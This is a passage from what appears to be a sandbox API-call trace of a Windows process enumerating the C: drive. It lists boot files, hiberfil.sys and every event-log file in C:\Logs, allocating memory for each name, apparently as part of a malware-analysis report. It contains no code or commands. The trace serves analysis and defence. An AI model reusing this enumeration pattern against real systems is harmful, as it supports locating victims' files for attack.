ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0158.835] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.835] lstrlenW (lpString="Windows6.1-KB958488-v6001-x86.msu") returned 33 [0158.835] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0 [0158.835] FindClose (in: hFindFile=0x677df0 | out: hFindFile=0x677df0) returned 1 [0158.836] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d798 | out: hHeap=0x660000) returned 1 [0158.836] FindNextFileW (in: hFindFile=0x6780f0, lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0158.836] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.836] lstrlenW (lpString="Boot") returned 4 [0158.836] FindNextFileW (in: hFindFile=0x6780f0, lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0158.836] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.836] lstrlenW (lpString="bootmgr") returned 7 [0158.836] FindNextFileW (in: hFindFile=0x6780f0, lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0158.836] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.836] lstrlenW (lpString="BOOTNXT") returned 7 [0158.836] FindNextFileW (in: hFindFile=0x6780f0, lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0158.836] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.836] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0158.836] FindNextFileW (in: hFindFile=0x6780f0, lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0158.836] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.836] lstrlenW (lpString="Documents and Settings") returned 22 [0158.836] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d798 [0158.836] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x6a5e60, ftCreationTime.dwLowDateTime=0x688f28, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0xffffffff [0158.838] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d798 | out: hHeap=0x660000) returned 1 [0158.838] FindNextFileW (in: hFindFile=0x6780f0, lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0158.838] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.838] lstrlenW (lpString="ESD") returned 3 [0158.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d798 [0158.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ESD\\*", lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677b30 [0158.875] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.875] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.875] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.875] FindClose (in: hFindFile=0x677b30 | out: hFindFile=0x677b30) returned 1 [0158.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d798 | out: hHeap=0x660000) returned 1 [0158.876] FindNextFileW (in: hFindFile=0x6780f0, lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab460c6f, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0158.876] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.876] lstrlenW (lpString="hiberfil.sys") returned 12 [0158.876] FindNextFileW (in: hFindFile=0x6780f0, lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0158.876] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.876] lstrlenW (lpString="Logs") returned 4 [0158.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d798 [0158.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Logs\\*", lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x678130 [0158.881] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.886] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.886] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Application.evtx", cAlternateFileName="APPLIC~1.EVT")) returned 1 [0158.886] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.886] lstrlenW (lpString="Application.evtx") returned 16 [0158.886] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a) returned 0x688f28 [0158.886] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="HardwareEvents.evtx", cAlternateFileName="HARDWA~1.EVT")) returned 1 [0158.887] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.887] lstrlenW (lpString="HardwareEvents.evtx") returned 19 [0158.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x6a6e68 [0158.887] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.evtx", cAlternateFileName="INTERN~1.EVT")) returned 1 [0158.887] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.887] lstrlenW (lpString="Internet Explorer.evtx") returned 22 [0158.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x96) returned 0x6a6f00 [0158.887] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Key Management Service.evtx", cAlternateFileName="KEYMAN~1.EVT")) returned 1 [0158.887] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.887] lstrlenW (lpString="Key Management Service.evtx") returned 27 [0158.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a2bd0 [0158.887] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Client-Licensing-Platform%4Admin.evtx", cAlternateFileName="MICROS~1.EVT")) returned 1 [0158.887] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.887] lstrlenW (lpString="Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 47 [0158.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc8) returned 0x69d9f0 [0158.888] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cAlternateFileName="MICROS~2.EVT")) returned 1 [0158.888] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.888] lstrlenW (lpString="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 78 [0158.888] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x106) returned 0x69dac0 [0158.888] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9c0f529, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cAlternateFileName="MICROS~3.EVT")) returned 1 [0158.888] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.888] lstrlenW (lpString="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 71 [0158.888] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf8) returned 0x69e5a8 [0158.888] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cAlternateFileName="MICROS~4.EVT")) returned 1 [0158.888] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.888] lstrlenW (lpString="Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 45 [0158.888] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc4) returned 0x69e6a8 [0158.888] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cAlternateFileName="MI2EEA~1.EVT")) returned 1 [0158.888] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.888] lstrlenW (lpString="Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 48 [0158.888] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xca) returned 0x679e58 [0158.889] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cAlternateFileName="MI07E1~1.EVT")) returned 1 [0158.889] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.889] lstrlenW (lpString="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 57 [0158.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xdc) returned 0x69e778 [0158.889] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cAlternateFileName="MI8196~1.EVT")) returned 1 [0158.889] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.889] lstrlenW (lpString="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 56 [0158.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xda) returned 0x69e860 [0158.889] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cAlternateFileName="MIE36C~1.EVT")) returned 1 [0158.889] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.889] lstrlenW (lpString="Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 46 [0158.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc6) returned 0x69e948 [0158.889] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppReadiness%4Admin.evtx", cAlternateFileName="MIC5CB~1.EVT")) returned 1 [0158.889] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.889] lstrlenW (lpString="Microsoft-Windows-AppReadiness%4Admin.evtx") returned 42 [0158.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x69ea18 [0158.890] lstrlenW (lpString="Microsoft-Windows-AppReadiness%4Operational.evtx") returned 48 [0158.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xca) returned 0x679f30 [0158.890] lstrlenW (lpString="Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 50 [0158.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xce) returned 0x679d80 [0158.890] lstrlenW (lpString="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 56 [0158.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xda) returned 0x69eae0 [0158.890] lstrlenW (lpString="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 55 [0158.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd8) returned 0x69ebc8 [0158.890] lstrlenW (lpString="Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 49 [0158.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xcc) returned 0x67a0e0 [0158.890] lstrlenW (lpString="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 64 [0158.891] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xea) returned 0x69eca8 [0158.891] lstrlenW (lpString="Microsoft-Windows-Bits-Client%4Operational.evtx") returned 47 [0158.891] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc8) returned 0x69eda0 [0158.892] lstrlenW (lpString="Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 49 [0158.892] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xcc) returned 0x6a80b0 [0158.892] lstrlenW (lpString="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 63 [0158.892] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xe8) returned 0x6a8fa8 [0158.892] lstrlenW (lpString="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 49 [0158.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xcc) returned 0x6a7e28 [0158.893] lstrlenW (lpString="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 48 [0158.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xca) returned 0x6a8848 [0158.893] lstrlenW (lpString="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 78 [0158.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x106) returned 0x6a9098 [0158.893] lstrlenW (lpString="Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 48 [0158.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xca) returned 0x6a8698 [0158.893] lstrlenW (lpString="Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 54 [0158.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x6a91a8 [0158.893] lstrlenW (lpString="Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 41 [0158.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbc) returned 0x6a9288 [0158.893] lstrlenW (lpString="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 43 [0158.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x6a9350 [0158.893] lstrlenW (lpString="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 49 [0158.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xcc) returned 0x6a8188 [0158.894] lstrlenW (lpString="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 59 [0158.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xe0) returned 0x6a9418 [0158.894] lstrlenW (lpString="Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 47 [0158.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc8) returned 0x6a9500 [0158.894] lstrlenW (lpString="Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 47 [0158.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc8) returned 0x6a95d0 [0158.894] lstrlenW (lpString="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 51 [0158.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x6a7fd8 [0158.894] lstrlenW (lpString="Microsoft-Windows-International%4Operational.evtx") returned 49 [0158.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xcc) returned 0x6a7840 [0158.894] lstrlenW (lpString="Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 47 [0158.894] RtlAllocateHeap 